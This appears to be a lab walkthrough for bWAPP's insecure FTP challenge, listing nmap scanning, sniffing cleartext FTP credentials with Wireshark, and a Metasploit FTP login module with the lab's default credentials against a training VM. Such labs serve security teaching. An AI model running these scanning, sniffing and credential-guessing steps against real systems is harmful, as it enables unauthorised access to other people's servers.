bWAPP Insecure FTP Configuration
Insecure FTP Configuration - Low Security Level
Solution:
Step 1. Install ftp
Command: sudo apt-get install ftp
*(If any manual inputs are required for first time setup then please complete the same).
Step 2. Check if ftp port is open
Command: sudo nmap -sS -sV 10.0.2.4
Step 3. Start wireshak
Command: wireshark (Follow steps as shown in the video)
Step 4. Go to the terminal and give below command
ftp 10.0.2.4 (Please change the ip with your beebox ip address).
Give necessary inputs (Please follow video for more details).
Step 5. Go to wireshark and check for the credentials (Search it under ftp protocol)
Note: The username and password.
If you are not aware of the username and password then you can create the username and password files and later while using metasploit you can specify the path. (Not covered in this video for information only).
Step 6. Start metasploit console
command - msfconsole
Follow below steps
search ftp login
use 2
show options
set RHOST your beebox ip address
set PASSWORD bug (If you want you can specify the file path here).
set USERNAME bee (If you want you can specify the file path here).
show options
run
PseudoTime
